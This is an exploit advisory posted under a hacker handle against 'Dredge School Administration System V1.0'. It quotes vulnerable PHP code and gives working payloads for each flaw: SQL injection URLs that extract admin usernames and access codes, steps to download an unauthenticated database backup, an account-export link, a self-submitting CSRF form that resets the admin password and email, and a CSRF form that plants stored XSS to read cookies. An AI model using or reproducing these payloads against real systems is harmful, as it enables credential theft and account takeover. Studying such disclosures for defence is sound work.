Dredge School Administration System V1.0 - Multiple Vulnerabilties ==================================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST .:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com] .:. Home : http://www.iphobos.com/blog/ .:. Script : http://sourceforge.net/projects/studentrecord/ #################################################################### I. Sql Injection ###################################### VULNERABILITY: CLASSIC MYSQL INJECTION ###################################### /loader.php (LINE: 10-17) ----------------------------------------------------------------------------- $searchwords = $_GET['load']; $searchwords = stripslashes($searchwords); $searchwords = strip_tags($searchwords); $searchwords = trim($searchwords, "'"); $load = $_GET['load']; mysql_select_db($database_drsa, $drsa); $query_file = "SELECT * FROM system WHERE system_name = '$searchwords'"; $file = mysql_query($query_file, $drsa); ----------------------------------------------------------------------------- ##################################################### EXPLOIT ##################################################### http://localhost/DSM/loader.php?load=editsession&Id=null+and+1=2+union+select+username,2,3,4,AccessCode,6+from+adminstaff http://localhost/DSM/loader.php?load=editterm&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4+from+adminstaff http://localhost/DSM/loader.php?load=editclass&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4,5,6+from+adminstaff ETC....... II. Backup Download ############## VULNERABILITY ############## /Backup/processbackup.php (LINE: 89-93) ----------------------------------------------------------------------------- //save file // $handle = fopen('db-backup-'.time().'-'.(md5(implode(',',$tables))).'.sql','w+'); $handle = fopen('RecordManager.sql','w+'); fwrite($handle,$return); fclose($handle); ----------------------------------------------------------------------------- ##################################################### EXPLOIT ##################################################### 1. Open http://localhost/DSM/Backup/processbackup.php 2. When you open the link produces RecordManager.sql 3. to download backup [http://localhost/DSM/Backup/RecordManager.sql] III. Accounts Disclosure <html> <title>Iphobos Blog</title> <label><a href="http://localhost/DSM/loader.php?load=data export send&tableid=3" class="button white">Export Accounts</a></label> </html> IV. Cross Site Request Forgery [Change Password & Email Admin] <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action=" http://localhost/DSM/loader.php?load=account settings"> <input type="hidden" name="AccessCode" value="123456" /> <input type="hidden" name="ConfirmAccessCode" value="123456" /> <input type="hidden" name="Email" value="email@hotmail.com" /> <input type="hidden" name="MM_update" value="form2" /> </form> </body> </html> V. Cross Site Scripting [CSRF with XSS Exploit] <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action=" http://localhost/DSM/loader.php?load=new subject"> <input type="hidden" name="Code" value="<script>alert(document.cookie);</script>" /> <input type="hidden" name="Description" value="Iphobos Blog" /> <input type="hidden" name="MM_insert" value="form1" /> </form> </body> </html> #################################################################### ####################################################################